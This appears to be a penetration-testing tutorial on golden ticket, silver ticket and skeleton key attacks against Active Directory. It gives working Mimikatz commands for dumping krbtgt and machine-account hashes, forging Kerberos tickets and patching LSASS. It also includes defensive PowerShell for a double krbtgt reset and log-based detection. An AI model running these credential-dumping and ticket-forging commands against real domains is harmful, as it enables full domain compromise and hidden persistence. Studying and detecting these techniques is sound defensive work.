IN THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES: 1. GOLDEN TICKET, 2. SILVER TICKET AND 3. SKELETON KEY

GOLDEN TICKET:

A golden ticket is a forged Kerberos TGT that a penetration tester builds from the domain's Security Identifier (SID), the domain name, and the NTLM hash of the krbtgt account, the built-in Active Directory account whose key protects every TGT in the domain. With it the tester can reach any device in the domain by performing PTT (Pass The Ticket). This works because the KDC validates a TGT by decrypting it with the krbtgt key and verifying the PAC signature made with that same key; whoever holds the krbtgt hash can therefore both encrypt a ticket and produce a valid signature, and the domain controller cannot tell a forged TGT from one it issued itself. The ticket can claim any username and any group membership, so it grants the privileges of the impersonated identity on systems across the domain. To make matters worse, a single reset of the krbtgt password does not stop the attack: the domain controller keeps the previous krbtgt key and still accepts tickets encrypted under it, so the password has to be reset twice (see the note at the end of the demo).

PRACTICAL DEMO:

  1. Fire up Windows Server 2022 and log in as a Domain Admin (or another account with local administrator rights on the domain controller, since the next steps read the krbtgt secret out of LSASS on the DC).
  2. Make sure Mimikatz is installed beforehand.
  3. Open PowerShell with admin privileges and launch Mimikatz. Run privilege::debug first so that Mimikatz is allowed to read LSASS. [screenshot]
  4. Use Mimikatz to extract the domain SID and the NTLM hash of the krbtgt account using the following command:
lsadump::lsa /inject /name:krbtgt

[screenshot]

  5. Next, use Mimikatz to create a golden ticket by providing the domain SID and the krbtgt NTLM hash using the following command:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket

The username specified in the preceding command does not need to be a valid user on the domain, because the DC never looks the name up; it simply trusts the PAC inside the ticket. Setting /id:500 puts the RID of the built-in Administrator account into that PAC, so the ticket carries Domain Admin rights whatever name it claims (Mimikatz also adds the default privileged groups, RIDs 512, 513, 518, 519 and 520, unless you override them with /groups). The /ticket option sets the file name the ticket is written to. [screenshot] The golden ticket is saved to disk in Mimikatz's current working directory, so it can be reused later or copied to another machine. Once injected, it lets the penetration tester access any system on the domain from the current session.

  6. Creating a super golden ticket with the maximum validity period:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket

[screenshot] The /endin option sets the ticket lifetime in minutes (Mimikatz defaults to 10 years). Bear in mind that the domain's Kerberos policy normally caps a TGT at 10 hours, so a ticket with a lifetime of years stands out to anyone who inspects the ticket cache or the 4769 events it produces.

  7. Pass the ticket with Mimikatz (this injects the forged TGT into the current logon session's Kerberos cache):
kerberos::ptt golden_ticket

[screenshot]

  8. To open a Command Prompt that uses the golden ticket session, use the following Mimikatz command:
misc::cmd

[screenshot]

  9. In the new Command Prompt, run whoami and then klist. [screenshot] As the screenshot shows, whoami still reports the account that is logged on to the system (sqladmin), because Pass The Ticket only replaces the Kerberos credentials of the current logon session and does not change the Windows identity; klist, however, lists the cached TGT for the NotAdmin user that came from the golden ticket. Any Kerberos-authenticated access made from this Command Prompt, for example dir \\HYDRA-DC\C$, is therefore performed as NotAdmin with RID 500, that is, as the domain Administrator, so you can reach any device on the network from this session.
Note

As previously mentioned in this chapter, a single change of the krbtgt password does not invalidate golden tickets: the domain controller keeps the previous krbtgt key and continues to accept tickets encrypted with it. Changing the password twice, and letting the first change replicate to every DC before making the second, discards the old key and invalidates every ticket forged with the old hash. Resetting it twice in quick succession also breaks legitimate TGTs issued before the first reset, so in production the two resets are usually spaced by at least the maximum TGT lifetime (10 hours by default).
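The double reset described in the note, as an added PowerShell example (this is not code from the original page or from Mimikatz). It performs one krbtgt reset and then polls the unicodePwd replication metadata on every DC until all of them carry the new key version; the second run, made after the waiting period, is what finally kills a golden ticket forged with the old hash. Function names are my own; it assumes a Domain Admin session on a host with the ActiveDirectory module and discovers the domain and DC names from AD rather than hard-coding MARVEL.local.

```powershell
# Added example, not from the original page: one krbtgt reset with a replication check.
# Run it as a Domain Admin from a host with the ActiveDirectory module, then run it a
# second time after every DC has converged AND the longest TGT lifetime (10 hours by
# default) has passed, so that legitimate in-flight tickets are not cut off as well.
Import-Module ActiveDirectory

function New-KrbtgtPassword {
    # Nobody ever types krbtgt's password; AD only derives the Kerberos keys from it,
    # so 32 random bytes as base64 is the right choice. SecureString for Set-ADAccountPassword.
    $bytes = New-Object byte[] 32
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    ConvertTo-SecureString ([Convert]::ToBase64String($bytes)) -AsPlainText -Force
}

function Get-KrbtgtKeyVersion {
    # Replication metadata for unicodePwd on one DC. Version increments by one per
    # password set, so comparing it across DCs shows whether the new key has arrived.
    param([string]$Server)
    $dn = (Get-ADUser -Identity krbtgt -Server $Server).DistinguishedName
    (Get-ADReplicationAttributeMetadata -Object $dn -Server $Server -Properties unicodePwd).Version
}

function Invoke-KrbtgtReset {
    param([int]$ReplicationTimeoutSeconds = 600)
    $pdc = (Get-ADDomain).PDCEmulator
    $dcs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
    $before = Get-KrbtgtKeyVersion -Server $pdc

    # Reset on the PDC emulator so there is a single originating write to wait for
    Set-ADAccountPassword -Identity krbtgt -Server $pdc -Reset -NewPassword (New-KrbtgtPassword)
    $target = Get-KrbtgtKeyVersion -Server $pdc
    Write-Host "krbtgt unicodePwd version on ${pdc}: $before -> $target; waiting for the other DCs"

    $deadline = (Get-Date).AddSeconds($ReplicationTimeoutSeconds)
    do {
        $lagging = @($dcs | Where-Object { (Get-KrbtgtKeyVersion -Server $_) -lt $target })
        if ($lagging.Count -eq 0) {
            Write-Host "All $($dcs.Count) DCs have key version $target"
            return $target
        }
        Start-Sleep -Seconds 15
    } while ((Get-Date) -lt $deadline)
    throw "krbtgt key version $target did not reach: $($lagging -join ', ')"
}

# First run: the old key becomes the 'previous' key and is still accepted by the KDC,
# so a golden ticket forged with the old hash keeps working. Second run (after the
# waiting period described above): the previous key is dropped and that ticket is
# rejected with KRB_AP_ERR_MODIFIED.
Invoke-KrbtgtReset | Out-Null
```

The script refuses to proceed silently: if any DC has not picked up the new version within the timeout it throws, because performing the second reset while a DC still runs on the old key is exactly the situation that takes down Kerberos for everything that DC serves.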



Silver ticket:

  1. Open the domain controller and log in as a Domain Admin (or another account with local administrator rights on the DC).
  2. Then load Mimikatz in PowerShell (opened as admin) and run privilege::debug.
  3. Next, retrieve the SID of the domain and the NTLM hash of the account that runs the service you want to forge a ticket for: a service account with a registered SPN, or a computer account. A silver ticket is encrypted with that account's key, so for a service hosted on the domain controller (HOST, CIFS, LDAP and so on) the key you need is the one of the computer account HYDRA-DC$:
lsadump::lsa /patch

[screenshot: NTLM hash of the DC computer account HYDRA-DC$] [screenshot]

Important

You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.

[screenshot] 4. Next, let's use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the domain controller's computer account (HYDRA-DC$), and the domain controller as the target. The service to impersonate is HOST:

kerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket

[screenshot] 5. Now pass the ticket and open a cmd session, using the same two Mimikatz commands as in the golden ticket section: [screenshot]
kerberos::ptt silver_ticket
misc::cmd

[screenshot]

Unlike a golden ticket, a silver ticket never touches the KDC: it is a forged service ticket that is presented straight to HYDRA-DC, so the domain controller logs no 4768/4769 for it and only the target host's 4624 logon event shows the access. It is valid only for the SPN it was built for (here HOST on HYDRA-DC; a CIFS or LDAP ticket needs its own /service value) and stops working as soon as the computer account password rotates, which happens every 30 days by default.


SKELETON KEY:

  1. Run the following commands on the domain controller to load the Mimikatz driver (mimidrv.sys has to be on the DC's disk next to the Mimikatz binary), strip the PPL protection from LSASS, patch the authentication code in memory with the skeleton key, and unload the driver again:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

[screenshot] 2. From now on every domain account also accepts the password mimikatz in addition to its real one. Open a new Command Prompt to try it out. [screenshot]

Important

With the skeleton key in place you can authenticate to any device in the domain with any valid domain username and the password mimikatz; the real password keeps working too, so users notice nothing. Two things to keep in mind: the host you are accessing must authenticate against the patched domain controller (with several DCs, only the ones you patched accept the skeleton password), and the patch lives only in LSASS memory. Mimikatz manipulates authentication code that is resident in memory, so the skeleton key is gone as soon as the domain controller reboots and has to be re-applied unless you add some other form of persistence. The original Mimikatz skeleton key also works only with RC4 Kerberos (encryption type 0x17); AES-only clients fail to log on with the skeleton password, and RC4 ticket requests for accounts that normally use AES are a detection opportunity for the defenders.

  3. In the new Command Prompt, run powershell to spawn a PowerShell session. [screenshot]
  4. Access the domain controller using the following command:
 Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\Administrator
  5. When prompted, enter mimikatz as the password instead of the domain admin's real password: [screenshot]
  6. Use the following commands to verify that the remote session is running on HYDRA-DC as MARVEL\Administrator: [screenshot]
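The three techniques above each leave a different trace in the Windows Security log, and the following PowerShell hunt, added here as an example (not code from the original page or from Mimikatz), checks for all three: a 4769 TGS request or a 4624 Kerberos logon for an account that does not exist in AD (the fake /user: names NotAdmin and SilverTicket), and a 4768 TGT issued with RC4 (0x17) to an account that normally receives AES tickets (the skeleton key only handles RC4). The sample events and the account lists are constructed to match the lab names (NotAdmin, SilverTicket, HYDRA-DC, MARVEL.local); the function names and the assumption that Administrator normally authenticates with AES are mine.

```powershell
# Added example, not from the original page. Constructed Security-log events, one per
# technique plus one benign one; on a real DC or server replace $sampleXml with
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624,4768,4769} | ForEach-Object { $_.ToXml() }
# and build $knownAccounts from Get-ADUser / Get-ADComputer instead of the literal list.
# (Real events carry a default xmlns; PowerShell's dot navigation ignores it, so the parsing below works unchanged.)

$knownAccounts = @('administrator', 'sqlservice', 'hydra-dc$')   # constructed stand-in for every user and computer in AD
$aesAccounts   = @('administrator')                              # constructed: accounts expected to get AES (0x12/0x11) tickets

# Golden ticket: the DC sees a TGS request for a user that does not exist in AD
$goldenEvent   = '<Event><System><EventID>4769</EventID><Computer>HYDRA-DC.MARVEL.local</Computer></System><EventData><Data Name="TargetUserName">NotAdmin@MARVEL.LOCAL</Data><Data Name="ServiceName">HYDRA-DC$</Data><Data Name="TicketEncryptionType">0x17</Data></EventData></Event>'
# Silver ticket: the target host sees a Kerberos network logon for a user that does not exist (and the DC sees nothing)
$silverEvent   = '<Event><System><EventID>4624</EventID><Computer>HYDRA-DC.MARVEL.local</Computer></System><EventData><Data Name="TargetUserName">SilverTicket</Data><Data Name="TargetDomainName">MARVEL.local</Data><Data Name="LogonType">3</Data><Data Name="AuthenticationPackageName">Kerberos</Data></EventData></Event>'
# Skeleton key: an RC4 TGT for an account that otherwise always gets AES
$skeletonEvent = '<Event><System><EventID>4768</EventID><Computer>HYDRA-DC.MARVEL.local</Computer></System><EventData><Data Name="TargetUserName">Administrator</Data><Data Name="TicketEncryptionType">0x17</Data><Data Name="IpAddress">::ffff:192.168.1.50</Data></EventData></Event>'
# Benign: the same account with an AES TGT
$benignEvent   = '<Event><System><EventID>4768</EventID><Computer>HYDRA-DC.MARVEL.local</Computer></System><EventData><Data Name="TargetUserName">Administrator</Data><Data Name="TicketEncryptionType">0x12</Data><Data Name="IpAddress">::ffff:192.168.1.50</Data></EventData></Event>'
$sampleXml = @($goldenEvent, $silverEvent, $skeletonEvent, $benignEvent)

function Get-EventField {
    # Pull one <Data Name="..."> value out of the event's EventData section
    param([xml]$Event, [string]$Name)
    ($Event.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Find-ForgedTicketIndicators {
    param([string[]]$EventXml, [string[]]$KnownAccounts, [string[]]$AesAccounts)
    $known = $KnownAccounts | ForEach-Object { $_.ToLower() }
    $aes   = $AesAccounts   | ForEach-Object { $_.ToLower() }
    foreach ($raw in $EventXml) {
        [xml]$ev = $raw
        $idNode = $ev.Event.System.EventID                      # plain text, or an element if it carries attributes
        $id = [int]$(if ($idNode -is [System.Xml.XmlElement]) { $idNode.'#text' } else { $idNode })
        $account  = ((Get-EventField $ev 'TargetUserName') -split '@')[0].ToLower()   # 4769 logs user@REALM
        $computer = $ev.Event.System.Computer
        switch ($id) {
            4769 { if ($known -notcontains $account) {
                       [pscustomobject]@{ EventID = $id; Host = $computer; Account = $account
                           Indicator = 'TGS request for an account that does not exist in AD (golden ticket with a fake /user:)' } } }
            4624 { if ((Get-EventField $ev 'AuthenticationPackageName') -eq 'Kerberos' -and $known -notcontains $account) {
                       [pscustomobject]@{ EventID = $id; Host = $computer; Account = $account
                           Indicator = 'Kerberos logon for an account that does not exist in AD (golden or silver ticket presented to this host)' } } }
            4768 { if ((Get-EventField $ev 'TicketEncryptionType') -eq '0x17' -and $aes -contains $account) {
                       [pscustomobject]@{ EventID = $id; Host = $computer; Account = $account
                           Indicator = 'RC4 (0x17) TGT for an account that normally uses AES (skeleton key only works with RC4)' } } }
        }
    }
}

# Three hits expected on the sample: notadmin (4769), silverticket (4624), administrator (4768, RC4); the AES 4768 is silent
Find-ForgedTicketIndicators -EventXml $sampleXml -KnownAccounts $knownAccounts -AesAccounts $aesAccounts | Format-Table -AutoSize
```

Note what this does and does not catch: a golden or silver ticket built with a real username and correct RID produces none of the first two indicators, and the remaining signal is then the ticket lifetime (a TGT valid for years) or a 4624 on a host with no matching 4769 on any DC, which needs log collection from both sides to correlate.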

Further reading:

• Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/Kerberos
• OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/
• OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/
• LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/T1557/001/
• Active Directory Security – https://adsecurity.org/